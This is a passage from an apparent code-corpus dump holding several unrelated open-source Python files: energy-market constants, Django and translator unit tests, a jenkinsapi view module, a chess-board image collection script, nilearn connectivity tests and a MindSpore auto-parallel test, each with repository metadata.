Packages/constants.py | Bemesko/Intelligence-of-Home-GUI | 0 | 8534 | <reponame>Bemesko/Intelligence-of-Home-GUI<filename>Packages/constants.py
import enum
BASELINE = "baseline"
ENERGY = "energy"
MAX_PRICE = "max_price"
START_PRICE = "starting_price"
INCREMENT = "increment"
MIN_PRICE = "min_price"
MAX_LOT_SIZE = "max_lot_size_wh"
NAMESERVER_AGENT_AMOUNT = 3
ATTRIBUTE_LIST_LENGTH = 50
NEXT_ENERGY_CONSUMPTION = "next_energy_consumption"
NEXT_ENERGY_GENERATION = "next_energy_generation"
ENERGY_DIFFERENCE = "energy_difference"
ENERGY_MARKET_PRICE = "energy_market_price"
WANTED_ENERGY = "wanted_energy"
ENERGY_BUY_MAX_PRICE = "energy_buy_max_price"
ENERGY_BUY_STARTING_PRICE = "energy_buy_starting_price"
ENERGY_BUY_PRICE_INCREMENT = "energy_buy_price_increment"
ENERGY_SELL_MIN_PRICE = "energy_sell_min_price"
class buy_baseline(enum.Enum):
deficit = 0
all_energy = 1
infinite = 2
none = 3
class sell_baseline(enum.Enum):
surplus = 0
all_energy = 1
none = 2
| import enum
BASELINE = "baseline"
ENERGY = "energy"
MAX_PRICE = "max_price"
START_PRICE = "starting_price"
INCREMENT = "increment"
MIN_PRICE = "min_price"
MAX_LOT_SIZE = "max_lot_size_wh"
NAMESERVER_AGENT_AMOUNT = 3
ATTRIBUTE_LIST_LENGTH = 50
NEXT_ENERGY_CONSUMPTION = "next_energy_consumption"
NEXT_ENERGY_GENERATION = "next_energy_generation"
ENERGY_DIFFERENCE = "energy_difference"
ENERGY_MARKET_PRICE = "energy_market_price"
WANTED_ENERGY = "wanted_energy"
ENERGY_BUY_MAX_PRICE = "energy_buy_max_price"
ENERGY_BUY_STARTING_PRICE = "energy_buy_starting_price"
ENERGY_BUY_PRICE_INCREMENT = "energy_buy_price_increment"
ENERGY_SELL_MIN_PRICE = "energy_sell_min_price"
class buy_baseline(enum.Enum):
deficit = 0
all_energy = 1
infinite = 2
none = 3
class sell_baseline(enum.Enum):
surplus = 0
all_energy = 1
none = 2 | none | 1 | 2.580655 | 3 |
|
target/tests.py | groundupnews/gu | 19 | 8535 | <reponame>groundupnews/gu
from django.contrib.auth.models import User
from django.test import TestCase
from django.test import Client
from django.urls import reverse
from target import models
from django.utils import timezone
# Create your tests here.
class URLSWork(TestCase):
@classmethod
def setUpTestData(cls):
target = models.Target()
target.letters = 'practical'
target.words = 'practical'
target.published = timezone.now()
target.number = 1
target.save()
def test_urls(self):
user = User.objects.create_user('admin', '<EMAIL>', '<PASSWORD>')
user.is_staff = True
user.is_active = True
user.is_superuser = True
user.save()
c = Client()
response = c.login(username='admin', password='<PASSWORD>')
self.assertEqual(response, True)
url = reverse('target:list')
response = c.get(url)
self.assertEqual(response.status_code, 200)
target = models.Target.objects.all()[0]
url = reverse('target:detail', args=(target.number,))
response = c.get(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create')
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create_letters', args=('practical',))
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:delete', args=(1,))
response = c.get(url)
self.assertEqual(response.status_code, 200)
| from django.contrib.auth.models import User
from django.test import TestCase
from django.test import Client
from django.urls import reverse
from target import models
from django.utils import timezone
# Create your tests here.
class URLSWork(TestCase):
@classmethod
def setUpTestData(cls):
target = models.Target()
target.letters = 'practical'
target.words = 'practical'
target.published = timezone.now()
target.number = 1
target.save()
def test_urls(self):
user = User.objects.create_user('admin', '<EMAIL>', '<PASSWORD>')
user.is_staff = True
user.is_active = True
user.is_superuser = True
user.save()
c = Client()
response = c.login(username='admin', password='<PASSWORD>')
self.assertEqual(response, True)
url = reverse('target:list')
response = c.get(url)
self.assertEqual(response.status_code, 200)
target = models.Target.objects.all()[0]
url = reverse('target:detail', args=(target.number,))
response = c.get(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create')
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create_letters', args=('practical',))
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:delete', args=(1,))
response = c.get(url)
self.assertEqual(response.status_code, 200) | en | 0.95562 | # Create your tests here. | 2.474484 | 2 |
jenkinsapi/view.py | julienduchesne/jenkinsapi | 0 | 8536 | <reponame>julienduchesne/jenkinsapi
"""
Module for jenkinsapi views
"""
import six
import logging
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.job import Job
from jenkinsapi.custom_exceptions import NotFound
log = logging.getLogger(__name__)
class View(JenkinsBase):
"""
View class
"""
def __init__(self, url, name, jenkins_obj):
self.name = name
self.jenkins_obj = jenkins_obj
JenkinsBase.__init__(self, url)
self.deleted = False
def __str__(self):
return self.name
def __getitem__(self, job_name):
assert isinstance(job_name, str)
api_url = self.python_api_url(self.get_job_url(job_name))
return Job(api_url, job_name, self.jenkins_obj)
def __contains__(self, job_name):
"""
True if view_name is the name of a defined view
"""
return job_name in self.keys()
def delete(self):
"""
Remove this view object
"""
url = "%s/doDelete" % self.baseurl
self.jenkins_obj.requester.post_and_confirm_status(url, data='')
self.jenkins_obj.poll()
self.deleted = True
def keys(self):
return self.get_job_dict().keys()
def iteritems(self):
it = six.iteritems(self.get_job_dict())
for name, url in it:
yield name, Job(url, name, self.jenkins_obj)
def values(self):
return [a[1] for a in self.iteritems()]
def items(self):
return [a for a in self.iteritems()]
def _get_jobs(self):
if 'jobs' in self._data:
for viewdict in self._data["jobs"]:
yield viewdict["name"], viewdict["url"]
def get_job_dict(self):
return dict(self._get_jobs())
def __len__(self):
return len(self.get_job_dict().keys())
def get_job_url(self, str_job_name):
if str_job_name in self:
return self.get_job_dict()[str_job_name]
else:
# noinspection PyUnboundLocalVariable
views_jobs = ", ".join(self.get_job_dict().keys())
raise NotFound("Job %s is not known, available jobs"
" in view are: %s" % (str_job_name, views_jobs))
def get_jenkins_obj(self):
return self.jenkins_obj
def add_job(self, str_job_name, job=None):
"""
Add job to a view
:param str_job_name: name of the job to be added
:param job: Job object to be added
:return: True if job has been added, False if job already exists or
job not known to Jenkins
"""
if not job:
if str_job_name in self.get_job_dict():
log.warning(
'Job %s is already in the view %s',
str_job_name, self.name)
return False
else:
# Since this call can be made from nested view,
# which doesn't have any jobs, we can miss existing job
# Thus let's create top level Jenkins and ask him
# http://jenkins:8080/view/CRT/view/CRT-FB/view/CRT-SCRT-1301/
top_jenkins = self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl.split('view/')[0])
if not top_jenkins.has_job(str_job_name):
log.error(
msg='Job "%s" is not known to Jenkins' %
str_job_name)
return False
else:
job = top_jenkins.get_job(str_job_name)
log.info(msg='Creating job %s in view %s' % (str_job_name, self.name))
url = '%s/addJobToView' % self.baseurl
params = {'name': str_job_name}
self.get_jenkins_obj().requester.post_and_confirm_status(
url,
data={},
params=params)
self.poll()
log.debug(msg='Job "%s" has been added to a view "%s"' %
(job.name, self.name))
return True
def _get_nested_views(self):
for viewdict in self._data.get("views", []):
yield viewdict["name"], viewdict["url"]
def get_nested_view_dict(self):
return dict(self._get_nested_views())
def get_config_xml_url(self):
return '%s/config.xml' % self.baseurl
def get_config(self):
"""
Return the config.xml from the view
"""
url = self.get_config_xml_url()
response = self.get_jenkins_obj().requester.get_and_confirm_status(url)
return response.text
def update_config(self, config):
"""
Update the config.xml to the view
"""
url = self.get_config_xml_url()
config = str(config) # cast unicode in case of Python 2
response = self.get_jenkins_obj().requester.post_url(
url, params={}, data=config)
return response.text
@property
def views(self):
return self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl).views
| """
Module for jenkinsapi views
"""
import six
import logging
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.job import Job
from jenkinsapi.custom_exceptions import NotFound
log = logging.getLogger(__name__)
class View(JenkinsBase):
"""
View class
"""
def __init__(self, url, name, jenkins_obj):
self.name = name
self.jenkins_obj = jenkins_obj
JenkinsBase.__init__(self, url)
self.deleted = False
def __str__(self):
return self.name
def __getitem__(self, job_name):
assert isinstance(job_name, str)
api_url = self.python_api_url(self.get_job_url(job_name))
return Job(api_url, job_name, self.jenkins_obj)
def __contains__(self, job_name):
"""
True if view_name is the name of a defined view
"""
return job_name in self.keys()
def delete(self):
"""
Remove this view object
"""
url = "%s/doDelete" % self.baseurl
self.jenkins_obj.requester.post_and_confirm_status(url, data='')
self.jenkins_obj.poll()
self.deleted = True
def keys(self):
return self.get_job_dict().keys()
def iteritems(self):
it = six.iteritems(self.get_job_dict())
for name, url in it:
yield name, Job(url, name, self.jenkins_obj)
def values(self):
return [a[1] for a in self.iteritems()]
def items(self):
return [a for a in self.iteritems()]
def _get_jobs(self):
if 'jobs' in self._data:
for viewdict in self._data["jobs"]:
yield viewdict["name"], viewdict["url"]
def get_job_dict(self):
return dict(self._get_jobs())
def __len__(self):
return len(self.get_job_dict().keys())
def get_job_url(self, str_job_name):
if str_job_name in self:
return self.get_job_dict()[str_job_name]
else:
# noinspection PyUnboundLocalVariable
views_jobs = ", ".join(self.get_job_dict().keys())
raise NotFound("Job %s is not known, available jobs"
" in view are: %s" % (str_job_name, views_jobs))
def get_jenkins_obj(self):
return self.jenkins_obj
def add_job(self, str_job_name, job=None):
"""
Add job to a view
:param str_job_name: name of the job to be added
:param job: Job object to be added
:return: True if job has been added, False if job already exists or
job not known to Jenkins
"""
if not job:
if str_job_name in self.get_job_dict():
log.warning(
'Job %s is already in the view %s',
str_job_name, self.name)
return False
else:
# Since this call can be made from nested view,
# which doesn't have any jobs, we can miss existing job
# Thus let's create top level Jenkins and ask him
# http://jenkins:8080/view/CRT/view/CRT-FB/view/CRT-SCRT-1301/
top_jenkins = self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl.split('view/')[0])
if not top_jenkins.has_job(str_job_name):
log.error(
msg='Job "%s" is not known to Jenkins' %
str_job_name)
return False
else:
job = top_jenkins.get_job(str_job_name)
log.info(msg='Creating job %s in view %s' % (str_job_name, self.name))
url = '%s/addJobToView' % self.baseurl
params = {'name': str_job_name}
self.get_jenkins_obj().requester.post_and_confirm_status(
url,
data={},
params=params)
self.poll()
log.debug(msg='Job "%s" has been added to a view "%s"' %
(job.name, self.name))
return True
def _get_nested_views(self):
for viewdict in self._data.get("views", []):
yield viewdict["name"], viewdict["url"]
def get_nested_view_dict(self):
return dict(self._get_nested_views())
def get_config_xml_url(self):
return '%s/config.xml' % self.baseurl
def get_config(self):
"""
Return the config.xml from the view
"""
url = self.get_config_xml_url()
response = self.get_jenkins_obj().requester.get_and_confirm_status(url)
return response.text
def update_config(self, config):
"""
Update the config.xml to the view
"""
url = self.get_config_xml_url()
config = str(config) # cast unicode in case of Python 2
response = self.get_jenkins_obj().requester.post_url(
url, params={}, data=config)
return response.text
@property
def views(self):
return self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl).views | en | 0.881594 | Module for jenkinsapi views View class True if view_name is the name of a defined view Remove this view object # noinspection PyUnboundLocalVariable Add job to a view :param str_job_name: name of the job to be added :param job: Job object to be added :return: True if job has been added, False if job already exists or job not known to Jenkins # Since this call can be made from nested view, # which doesn't have any jobs, we can miss existing job # Thus let's create top level Jenkins and ask him # http://jenkins:8080/view/CRT/view/CRT-FB/view/CRT-SCRT-1301/ Return the config.xml from the view Update the config.xml to the view # cast unicode in case of Python 2 | 2.421739 | 2 |
core/vision/collection.py | jmarangola/cv-chess | 0 | 8537 | """
Autonomous dataset collection for the Jetson Nano
<NAME> - <EMAIL>
"""
import datasets
import json
from datasets import Board, ChessPiece, PieceColor, PieceType
from realsense_utils import RealSenseCamera  # RealSenseCamera is instantiated in the __main__ block below
import preprocessing as pr
import cv2
import pandas as pd
import os
from os.path import isfile, join
import uuid
import numpy as np
from PIL import Image
from PIL.ExifTags import TAGS
RUN_CALIBRATION = False # Run calibration sequence or use preexisting board four corners data from config/setup.txt
BOARD_SAVE_DEST = r"board_metadata.jpeg" # Where the debug board-metadata visualization image is saved (to verify the metadata is set up correctly)
TMP_DEST = "/home/spark/cv-chess/core/vision/tmp/" # Where images are temporarily saved before being uploaded to drive in a batch
LOCAL_MD_FILENAME = "local_meta.json"
LOCAL_METADATA_JSON_PATH = TMP_DEST + LOCAL_MD_FILENAME
TL = [250, 115]
BL = [250, 687]
TR = [825, 115]
BR = [825, 687]
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
def fen_to_dict(string):
name_to_num = {
'p' : 1,
'b' : 2,
'n' : 3,
'r' : 4,
'q' : 5,
'k' : 6,
}
out = {}
letters = "ABCDEFGH"
for i in range(8):
for j in range(1,9):
out[letters[i] + str(j)] = 0
string = string.split('/')
new_string = []
for s in string:
for d in s:
if d.isnumeric():
ix = s.index(d)
for i in range(int(d)-1):
s = s[0:ix] + '1' + s[ix:]
new_string.append(s)
for i in range(8, 0, -1):
for j in range(8):
if new_string[8-i][j].isnumeric():
out[letters[j] + str(i)] = 0
else:
out[letters[j] + str(i)] = name_to_num[new_string[8-i][j].lower()]
return out
def get_sorted_time_saved(images):
"""
Given a list of image filenames, return a dictionary of image filename : time written to disk pairs.
Purpose: for debugging dataset
Args:
images (list): List of image filenames
Returns:
dict: dict of image filenames
"""
image_dat = []
for image in images:
imtmp = Image.open(image)
tmp = imtmp.getexif()
image_dat.append(tmp)
dt = {}
for exifdata in image_dat:
idx = image_dat.index(exifdata)
# iterating over all EXIF data fields
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
# Add datetime field
if tag == "DateTime":
dt[images[idx]] = data
print(f"{tag:25}: {data}")
output = sorted(dt.items(), key=lambda eta: eta[1], reverse=False)
print(output)
dt = {}
for item in output:
dt[item[0]] = item[1]
with open(TMP_DEST + "datetimes.json", "w") as wr: # dump to json
json.dump(output, wr)
return output
def del_batch_from_text_file(file):
filenames = []
with open(file, "r") as rd:
for line in rd.readlines():
# parse each line for file to delete:
commaIndex = line.index(",")
filename = line[:commaIndex]
os.remove(TMP_DEST + filename)
if __name__ == "__main__":
# Initialize camera
realsense = RealSenseCamera()
"""
# Check if calibration sequence must be run
if RUN_CALIBRATION:
realsense.calibrate_board_pos()
if realsense.get_board_corners() is None:
print("Failed to run calibration. Exiting...")
exit()
"""
"""
board_meta = Board()
# Add pieces to metadata csv
board_meta.add_pieces({
"A1":ChessPiece(PieceType.KNIGHT, PieceColor.BLUE), "A2":ChessPiece(PieceType.PAWN, PieceColor.BLUE), "A3":ChessPiece(PieceType.PAWN, PieceColor.ORANGE)
})
board_meta.display_board(dest=BOARD_SAVE_DEST)
print(f"Verify board is correct output dest={BOARD_SAVE_DEST}.\nContine [Y] or Exit [E]?")
validate = input()
if validate.upper() == "E" or validate.upper() == "N":
print("Exiting...")
realsense.stop_pipeline()
exit()
files = []
files = [f for f in os.listdir(TMP_DEST) if isfile(os.path.join(TMP_DEST, f))]
# Check to see if there is pre-existing .csv metadata to add to
if LOCAL_MD_FILENAME in files:
try:
total_metadata = pd.read_csv(LOCAL_METADATA_JSON_PATH)
except:
total_metadata = pd.DataFrame()
else:
total_metadata = pd.DataFrame()
# Loop through input
while input() != "exit":
img = realsense.capture_rgb_image() # Capture the image
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
files = pr.board_to_64_files(img, base_directory=TMP_DEST) # Break image up into 64 files
piece_types, piece_colors = [], []
batch_id = uuid.uuid1()
for tile in sorted(files.keys()):
temp = board_meta.get_chess_piece(tile)
if temp is None:
piece_types.append(None)
piece_colors.append(None)
else:
piece_types.append(temp.piece_type.name)
piece_colors.append(temp.piece_color.name)
tmp_meta = pd.DataFrame({
"File" : [files[file] for file in files.keys()],
"Position" : [file for file in files.keys()],
"Piece Type" : piece_types,
"Piece Color" : piece_colors,
"Batch ID" : [batch_id for i in range(len(files.keys()))]
})
frames = [total_metadata, tmp_meta]
total_metadata = pd.concat(frames) # Concatenate dataframes
print(total_metadata)
total_metadata.to_csv(path_or_buf=LOCAL_METADATA_JSON_PATH)
"""
#pr.delete_board2_64_output(base_directory=TMP_DEST)
FEN = "5P1R/1Q1RP1P1/3R1P2/QQPPK1R1/1B1K1N2/B1R2N1B/1N2B3R/2B1BN2".upper()
last_input = None
df = pd.DataFrame()
while input() != "end":
        resp = input("[n] for new fen, [any other key to take an image] >")
        if resp == "n":
            FEN = input("Enter a FEN:").upper()
img = realsense.capture_rgb_image() # Capture the image
print("Captured image")
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
cv2.imwrite("original.jpg", img)
# Get dict of positions
temp_dict = fen_to_dict(FEN)
tiles = pr.board_to_64_files(img, temp_dict, base_directory=TMP_DEST) # Break image up into 64 files
data_frame = pd.DataFrame(tiles)
data_frame = data_frame.transpose()
frames = [df, data_frame]
df = pd.concat(frames) # Concatenate dataframe
csv_file = df.to_csv(TMP_DEST + 'my_csv.csv', header=False, index=False)
# Close streams and end pipeline
realsense.stop_pipeline()
| en | 0.496621 | Autonomous dataset collection of data for jetson nano <NAME> - <EMAIL> #from realsense_utils import RealSenseCamera # Run calibration sequence or use preexisting board four corners data from config/setup.txt # Where the debug metadata board visualization image is saved (to ensure we properly setup the metadata) # Where images are temporarily saved before being uploaded to drive in a batch Given a list of image filenames, return a dictionary of image filename : time written to disk pairs. Purpose: for debugging dataset Args: images (list): List of image filenames Returns: dict: dict of image filenames # iterating over all EXIF data fields # decode bytes # Add datetime field # dump to json # parse each line for file to delete: # Initialize camera # Check if calibration sequence must be run if RUN_CALIBRATION: realsense.calibrate_board_pos() if realsense.get_board_corners() is None: print("Failed to run calibration. Exiting...") exit() board_meta = Board() # Add pieces to metadata csv board_meta.add_pieces({ "A1":ChessPiece(PieceType.KNIGHT, PieceColor.BLUE), "A2":ChessPiece(PieceType.PAWN, PieceColor.BLUE), "A3":ChessPiece(PieceType.PAWN, PieceColor.ORANGE) }) board_meta.display_board(dest=BOARD_SAVE_DEST) print(f"Verify board is correct output dest={BOARD_SAVE_DEST}.\nContine [Y] or Exit [E]?") validate = input() if validate.upper() == "E" or validate.upper() == "N": print("Exiting...") realsense.stop_pipeline() exit() files = [] files = [f for f in os.listdir(TMP_DEST) if isfile(os.path.join(TMP_DEST, f))] # Check to see if there is pre-existing .csv metadata to add to if LOCAL_MD_FILENAME in files: try: total_metadata = pd.read_csv(LOCAL_METADATA_JSON_PATH) except: total_metadata = pd.DataFrame() else: total_metadata = pd.DataFrame() # Loop through input while input() != "exit": img = realsense.capture_rgb_image() # Capture the image img = img[105:690, 348:940, :] img = rotate_image(img, 1.5) files = pr.board_to_64_files(img, base_directory=TMP_DEST) # Break image up into 64 files piece_types, piece_colors = [], [] batch_id = uuid.uuid1() for tile in sorted(files.keys()): temp = board_meta.get_chess_piece(tile) if temp is None: piece_types.append(None) piece_colors.append(None) else: piece_types.append(temp.piece_type.name) piece_colors.append(temp.piece_color.name) tmp_meta = pd.DataFrame({ "File" : [files[file] for file in files.keys()], "Position" : [file for file in files.keys()], "Piece Type" : piece_types, "Piece Color" : piece_colors, "Batch ID" : [batch_id for i in range(len(files.keys()))] }) frames = [total_metadata, tmp_meta] total_metadata = pd.concat(frames) # Concatenate dataframes print(total_metadata) total_metadata.to_csv(path_or_buf=LOCAL_METADATA_JSON_PATH) #pr.delete_board2_64_output(base_directory=TMP_DEST) # Capture the image # Get dict of positions # Break image up into 64 files # Concatenate dataframe # Close streams and end pipeline | 2.465792 | 2 |
tests/test_sbfc.py | htwangtw/sbfc | 0 | 8538 | <reponame>htwangtw/sbfc
import os
import numpy as np
import pandas as pd
from nilearn import datasets
from sbfc.parser import seed_base_connectivity
seed = os.path.dirname(__file__) + "/data/difumo64_pcc.nii.gz"
def _make_data_single_run(confound=True):
adhd_dataset = datasets.fetch_adhd(n_subjects=2)
group_confounds = pd.DataFrame(adhd_dataset.phenotypic)[
["Subject", "MeanFD", "age", "sex"]
]
group_confounds = group_confounds.rename(columns={"Subject": "subject_label"})
group_design_matrix = pd.DataFrame(adhd_dataset.phenotypic)[["Subject"]]
group_design_matrix = group_design_matrix.rename(
columns={"Subject": "subject_label"}
)
group_design_matrix["pheno"] = np.random.rand(2)
group_contrast = pd.DataFrame([1], columns=["pheno"])
if confound:
func_img = {
f"{sub_id}": {"func": [func], "confound": [confound]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
else:
func_img = {
f"{sub_id}": {"func": [func], "confound": [None]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
return func_img, group_design_matrix, group_confounds, group_contrast
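# Added note (not in the original tests): the fixtures build the per-subject
# mapping that seed_base_connectivity appears to expect, i.e.
#   {"<subject_label>": {"func": [run1, ...], "confound": [conf1_or_None, ...]}, ...}
# alongside a group confound table, a group design matrix and a contrast frame.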
def _make_data_multi_run():
adhd_dataset = datasets.fetch_adhd(n_subjects=2)
group_confounds = pd.DataFrame(adhd_dataset.phenotypic)[
["Subject", "MeanFD", "age", "sex"]
]
group_confounds = group_confounds.rename(columns={"Subject": "subject_label"})
group_design_matrix = pd.DataFrame(adhd_dataset.phenotypic)[["Subject"]]
group_design_matrix = group_design_matrix.rename(
columns={"Subject": "subject_label"}
)
group_design_matrix["pheno"] = np.random.rand(2)
group_contrast = pd.DataFrame([1], columns=["pheno"])
func_img = {
f"{sub_id}": {"func": [func, func], "confound": [confound, confound]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
return func_img, group_design_matrix, group_confounds, group_contrast
def test_sbfc_single_run(tmpdir):
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_single_run()
# Prepare seed
pcc_coords = (0, -53, 26)
first_m, first_con, s_m = seed_base_connectivity(
func_img,
pcc_coords,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_single_run(confound=False)
# mask seed
first_m, first_con, s_m = seed_base_connectivity(
func_img,
seed,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
def test_sbfc_multi_run(tmpdir):
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_multi_run()
# mask seed
first_m, first_con, s_m = seed_base_connectivity(
func_img,
seed,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
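# Illustrative invocation (added note): these tests fetch two ADHD-200 subjects
# through nilearn on first use, e.g.
#   pytest tests/test_sbfc.py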
assert len(first_m) == 2 | en | 0.458905 | # Prepare seed # mask seed # mask seed | 2.324539 | 2 |
final_project/machinetranslation/tests/test.py | ChrisOmeh/xzceb-flask_eng_fr | 0 | 8539 | <gh_stars>0
import unittest
from translator import english_to_french, french_to_english
class TestenglishToFrench(unittest.TestCase):
def test1(self):
self.assertEqual(english_to_french(["Hello"]), "Bonjour")
self.assertNotEqual(english_to_french(["Bonjour"]), "Hello")
class TestfrenchToEnglish(unittest.TestCase):
def test1(self):
self.assertEqual(french_to_english(["Bonjour"]),'Hello')
self.assertNotEqual(french_to_english(["Hello"]), "Bonjour")
if __name__ == "__main__":
unittest.main() | import unittest
from translator import english_to_french, french_to_english
class TestenglishToFrench(unittest.TestCase):
def test1(self):
self.assertEqual(english_to_french(["Hello"]), "Bonjour")
self.assertNotEqual(english_to_french(["Bonjour"]), "Hello")
class TestfrenchToEnglish(unittest.TestCase):
def test1(self):
self.assertEqual(french_to_english(["Bonjour"]),'Hello')
self.assertNotEqual(french_to_english(["Hello"]), "Bonjour")
if __name__ == "__main__":
unittest.main() | none | 1 | 3.384967 | 3 |
|
tests/ut/python/parallel/test_auto_parallel_transformer.py | huxian123/mindspore | 2 | 8540 | <reponame>huxian123/mindspore
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore import context
from mindspore.common.api import _executor
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from tests.ut.python.ops.test_math_ops import VirtualLoss
grad_all = C.GradOperation(get_all=True)
class NetWithLoss(nn.Cell):
def __init__(self, network):
super(NetWithLoss, self).__init__()
self.loss = VirtualLoss()
self.network = network
def construct(self, x):
predict = self.network(x)
return self.loss(predict)
class GradWrap(nn.Cell):
def __init__(self, network):
super(GradWrap, self).__init__()
self.network = network
def construct(self, x):
return grad_all(self.network)(x)
class CustomDense(nn.Cell):
def __init__(self, row, column):
super(CustomDense, self).__init__()
self.weight = Parameter(Tensor(np.ones([row, column]).astype(np.float32) * 0.01), "w", requires_grad=True)
self.bias = Parameter(Tensor(np.zeros([row, column]).astype(np.float32)), "b", requires_grad=True)
self.matmul1 = P.MatMul()
self.add2 = P.TensorAdd()
self.activation3 = nn.ReLU()
def construct(self, x):
mat_output = self.matmul1(x, self.weight)
add_output = self.add2(mat_output, self.bias)
output = self.activation3(add_output)
return output
class DenseMutMulNet(nn.Cell):
def __init__(self):
super(DenseMutMulNet, self).__init__()
self.fc1 = CustomDense(4096, 4096)
self.fc2 = CustomDense(4096, 4096)
self.fc3 = CustomDense(4096, 4096)
self.fc4 = CustomDense(4096, 4096)
self.relu4 = nn.ReLU()
self.relu5 = nn.ReLU()
self.transpose = P.Transpose()
self.matmul1 = P.MatMul()
self.matmul2 = P.MatMul()
def construct(self, x):
q = self.fc1(x)
k = self.fc2(x)
v = self.fc3(x)
k = self.transpose(k, (1, 0))
c = self.relu4(self.matmul1(q, k))
s = self.relu5(self.matmul2(c, v))
s = self.fc4(s)
return s
class MultiTransformer(nn.Cell):
def __init__(self, layer_nums=1):
super(MultiTransformer, self).__init__()
self.layer = self._make_layer(layer_nums)
def _make_layer(self, layer_num):
layers = []
for _ in range(0, layer_num):
layers.append(DenseMutMulNet())
return nn.SequentialCell(layers)
def construct(self, x):
out = self.layer(x)
return out
def test_dmnet_train_step():
size = 8
context.set_auto_parallel_context(device_num=size, global_rank=0)
input_ = Tensor(np.ones([4096, 4096]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(MultiTransformer()))
context.set_auto_parallel_context(parallel_mode="auto_parallel")
net.set_auto_parallel()
_executor.compile(net, input_)
| # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore import context
from mindspore.common.api import _executor
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from tests.ut.python.ops.test_math_ops import VirtualLoss
grad_all = C.GradOperation(get_all=True)
class NetWithLoss(nn.Cell):
def __init__(self, network):
super(NetWithLoss, self).__init__()
self.loss = VirtualLoss()
self.network = network
def construct(self, x):
predict = self.network(x)
return self.loss(predict)
class GradWrap(nn.Cell):
def __init__(self, network):
super(GradWrap, self).__init__()
self.network = network
def construct(self, x):
return grad_all(self.network)(x)
class CustomDense(nn.Cell):
def __init__(self, row, column):
super(CustomDense, self).__init__()
self.weight = Parameter(Tensor(np.ones([row, column]).astype(np.float32) * 0.01), "w", requires_grad=True)
self.bias = Parameter(Tensor(np.zeros([row, column]).astype(np.float32)), "b", requires_grad=True)
self.matmul1 = P.MatMul()
self.add2 = P.TensorAdd()
self.activation3 = nn.ReLU()
def construct(self, x):
mat_output = self.matmul1(x, self.weight)
add_output = self.add2(mat_output, self.bias)
output = self.activation3(add_output)
return output
class DenseMutMulNet(nn.Cell):
def __init__(self):
super(DenseMutMulNet, self).__init__()
self.fc1 = CustomDense(4096, 4096)
self.fc2 = CustomDense(4096, 4096)
self.fc3 = CustomDense(4096, 4096)
self.fc4 = CustomDense(4096, 4096)
self.relu4 = nn.ReLU()
self.relu5 = nn.ReLU()
self.transpose = P.Transpose()
self.matmul1 = P.MatMul()
self.matmul2 = P.MatMul()
def construct(self, x):
q = self.fc1(x)
k = self.fc2(x)
v = self.fc3(x)
k = self.transpose(k, (1, 0))
c = self.relu4(self.matmul1(q, k))
s = self.relu5(self.matmul2(c, v))
s = self.fc4(s)
return s
class MultiTransformer(nn.Cell):
def __init__(self, layer_nums=1):
super(MultiTransformer, self).__init__()
self.layer = self._make_layer(layer_nums)
def _make_layer(self, layer_num):
layers = []
for _ in range(0, layer_num):
layers.append(DenseMutMulNet())
return nn.SequentialCell(layers)
def construct(self, x):
out = self.layer(x)
return out
def test_dmnet_train_step():
size = 8
context.set_auto_parallel_context(device_num=size, global_rank=0)
input_ = Tensor(np.ones([4096, 4096]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(MultiTransformer()))
context.set_auto_parallel_context(parallel_mode="auto_parallel")
net.set_auto_parallel()
